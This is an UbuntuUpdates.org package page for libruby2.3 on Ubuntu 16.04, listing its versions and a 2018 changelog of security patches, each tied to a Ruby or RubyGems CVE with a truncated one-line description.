UbuntuUpdates.org

Package "libruby2.3"

Name: libruby2.3

Description:

Libraries necessary to run Ruby 2.3

Latest version: 2.3.1-2~ubuntu16.04.16
Release: xenial (16.04)
Level: security
Repository: main
Head package: ruby2.3
Homepage: http://www.ruby-lang.org/

Links


Download "libruby2.3"


Other versions of "libruby2.3" in Xenial

Repository Area Version
base main 2.3.0-5ubuntu1
updates main 2.3.1-2~ubuntu16.04.16
PPA: Brightbox Ruby NG Experimental 2.3.8-4bbox1~xenial1

Changelog

Version: 2.3.1-2~16.04.10 2018-06-14 14:07:54 UTC

  ruby2.3 (2.3.1-2~16.04.10) xenial-security; urgency=medium

  * SECURITY UPDATE: Malicious format string - buffer overrun
    - debian/patches/CVE-2017-0898.patch: fix in sprintf.c,
      test/ruby/test_sprintf.rb.
    - CVE-2017-0898
  * SECURITY UPDATE: Response splitting attack
    - debian/patches/CVE-2017-17742.patch: fix in webrick/httpresponse.rb,
      test/webrick/test_httpresponse.rb.
    - CVE-2017-17742
  * SECURITY UPDATE: Denial of service
    - debian/patches/CVE-2018-8777*.patch: fix in lib/webrick/httpresponse.rb,
      lib/webrick/httpservlet/filehandler.rb,
      test/webrick/test_filehandler.rb, test/webrick/test_httpresponse.rb.
    - CVE-2018-8777

 -- <email address hidden> (Leonidas S. Barbosa) Fri, 08 Jun 2018 11:24:57 -0300

Source diff to previous version
CVE-2017-0898 Ruby before 2.4.2, 2.3.5, and 2.2.8 is vulnerable to a malicious format string which contains a precious specifier (*) with a huge minus value. Such
CVE-2017-17742 Ruby before 2.2.10, 2.3.x before 2.3.7, 2.4.x before 2.4.4, 2.5.x before 2.5.1, and 2.6.0-preview1 allows an HTTP Response Splitting attack. An attac
CVE-2018-8777 In Ruby before 2.2.10, 2.3.x before 2.3.7, 2.4.x before 2.4.4, 2.5.x before 2.5.1, and 2.6.0-preview1, an attacker can pass a large HTTP request with

Version: 2.3.1-2~16.04.9 2018-04-16 19:06:56 UTC

  ruby2.3 (2.3.1-2~16.04.9) xenial-security; urgency=medium

  * SECURITY UPDATE: Directory traversal vulnerability
    - debian/patches/CVE-2018-6914.patch: fix in lib/tmpdir.rb,
      test/test_tempfile.rb.
    - CVE-2018-6914
  * SECURITY UPDATE: Buffer under-read
    - debian/patches/CVE-2018-8778.patch: fix in pack.c,
      test/ruby/test_pack.rb.
    - CVE-2018-8778
  * SECURITY UPDATE: Unintended socket
    - debian/patches/CVE-2018-8779.patch: fix in ext/socket/unixsocket.c,
      test/socket/test_unix.rb.
    - CVE-2018-8779
  * SECURITY UPDATE: Directory traversal
    - debian/patches/CVE-2018-8780.patch: fix in dir.c,
      test/ruby/test_dir.rb.
    - CVE-2018-8780

 -- <email address hidden> (Leonidas S. Barbosa) Fri, 13 Apr 2018 11:38:20 -0300

Source diff to previous version
CVE-2018-6914 Directory traversal vulnerability in the Dir.mktmpdir method in the tmpdir library in Ruby before 2.2.10, 2.3.x before 2.3.7, 2.4.x before 2.4.4, 2.5
CVE-2018-8778 In Ruby before 2.2.10, 2.3.x before 2.3.7, 2.4.x before 2.4.4, 2.5.x before 2.5.1, and 2.6.0-preview1, an attacker controlling the unpacking format (
CVE-2018-8779 In Ruby before 2.2.10, 2.3.x before 2.3.7, 2.4.x before 2.4.4, 2.5.x before 2.5.1, and 2.6.0-preview1, the UNIXServer.open and UNIXSocket.open method
CVE-2018-8780 In Ruby before 2.2.10, 2.3.x before 2.3.7, 2.4.x before 2.4.4, 2.5.x before 2.5.1, and 2.6.0-preview1, the Dir.open, Dir.new, Dir.entries and Dir.emp

Version: 2.3.1-2~16.04.7 2018-04-05 17:06:40 UTC

  ruby2.3 (2.3.1-2~16.04.7) xenial-security; urgency=medium

  * SECURITY UPDATE: Directory traversal
    - debian/patches/CVE-2018-1000073.patch: fix in
      lib/rubygems/package.rb.
    - CVE-2018-1000073
  * SECURITY UPDATE: Deserialization untrusted data
    - debian/patches/CVE-2018-1000074.patch fix in
      lib/rubygems/commands/owner_command.rb,
      test/rubygems/test_gem_commands_owner_command.rb.
    - CVE-2018-1000074
  * SECURITY UPDATE: Infinite loop
    - debian/patches/CVE-2018-1000075.patch: fix in
      lib/rubygems/package/tar_header.rb,
      test/rubygems/test_gem_package_tar_header.rb.
    - CVE-2018-1000075
  * SECURITY UPDATE: Improper verification of crypto
    signature
    - debian/patches/CVE-2018-1000076.patch: fix in
      lib/rubygems/package.rb, lib/rubygems/pacage/tar_writer.rb,
      test/rubygems/test_gem_pacakge.rg
    - CVE-2018-1000076
  * SECURITY UPDATE: Validation vulnerability
    - debian/patches/CVE-2018-1000077.patch: fix in
      lib/rubygems/specification.rb,
      test/rubygems/test_gem_specification.rb.
    - CVE-2018-1000077
  * SECURITY UPDATE: Cross site scripting
    - debian/patches/CVE-2018-1000078.patch: fix in
      lib/rubygems/server.rb.
    - CVE-2018-1000078
  * SECURITY UPDATE: Directory traversal
    - debian/patches/CVE-2018-1000079.patch: fix in
      lib/rubygems/package.rb.
    - CVE-2018-1000079

 -- <email address hidden> (Leonidas S. Barbosa) Wed, 04 Apr 2018 12:16:06 -0300

Source diff to previous version

Version: 2.3.1-2~16.04.6 2018-01-31 15:07:35 UTC

  ruby2.3 (2.3.1-2~16.04.6) xenial-security; urgency=medium

  * SECURITY UPDATE: fails to validade specification names
    - debian/patches/CVE-2017-0901-0902.patch: fix this.
    - CVE-2017-0901
  * SECURITY UPDATE: vulnerable to a DNS hijacking
    - debian/patches/CVE-2017-0901-0902.patch fix this.
    - CVE-2017-0902
  * SECURITY UPDATE: possible remote code execution
    - debian/patches/CVE-2017-0903.patch: whitelist classes
      and symbols that are in Gem spec YAML in lib/rubygems.rb,
      lib/rubygens/config_file.rb, lib/rubygems/package.rb,
      lib/rubygems/package/old.rb, lib/rubygems/safe_yaml.rb,
      lib/rubygems/specification.rb.
    - CVE-2017-0903

 -- <email address hidden> (Leonidas S. Barbosa) Tue, 30 Jan 2018 14:54:19 -0300

Source diff to previous version
CVE-2017-0901 RubyGems version 2.6.12 and earlier fails to validate specification names, allowing a maliciously crafted gem to potentially overwrite any file on th
CVE-2017-0902 RubyGems version 2.6.12 and earlier is vulnerable to a DNS hijacking vulnerability that allows a MITM attacker to force the RubyGems client to downlo
CVE-2017-0903 RubyGems versions between 2.0.0 and 2.6.13 are vulnerable to a possible remote code execution vulnerability. YAML deserialization of gem specificatio

Version: 2.3.1-2~16.04.5 2018-01-10 15:07:04 UTC

  ruby2.3 (2.3.1-2~16.04.5) xenial-security; urgency=medium

  * SECURITY UPDATE: possible command injection attacks through
    kernel#open
    - debian/patches/CVE-2017-17790.patch: fix uses of Kernel#open in
      lib/resolv.rb.
    - CVE-2017-17790
  * SECURITY UPDATE: possibly execute arbitrary commands via a crafted user name
    - debian/patches/CVE-2017-10784.patch: sanitize any type of logs in
      lib/webrick/httpstatus.rb, lib/webrick/log.rb and test/webrick/test_httpauth.rb.
    - CVE-2017-10784
  * SECURITY UPDATE: denial of service via a crafted string
    - debian/patches/CVE-2017-14033.patch: fix in ext/openssl/ossl_asn1.c.
    - CVE-2017-14033
  * SECURITY UPDATE: Arbitrary memory expose during a JSON.generate call
    - debian/patches/CVE-2017-14064.patch: fix this in
      ext/json/ext/generator/generator.c and ext/json/ext/generator/generator.h.

 -- <email address hidden> (Leonidas S. Barbosa) Tue, 09 Jan 2018 11:43:22 -0300

CVE-2017-17790 The lazy_initialize function in lib/resolv.rb in Ruby through 2.4.3 uses Kernel#open, which might allow Command Injection attacks, as demonstrated by
CVE-2017-10784 The Basic authentication code in WEBrick library in Ruby before 2.2.8, 2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows remote attackers to inject
CVE-2017-14033 The decode method in the OpenSSL::ASN1 module in Ruby before 2.2.8, 2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows attackers to cause a denial of
CVE-2017-14064 Ruby through 2.2.7, 2.3.x through 2.3.4, and 2.4.x through 2.4.1 can expose arbitrary memory during a JSON.generate call. The issues lies in using st



About   -   Send Feedback to @ubuntu_updates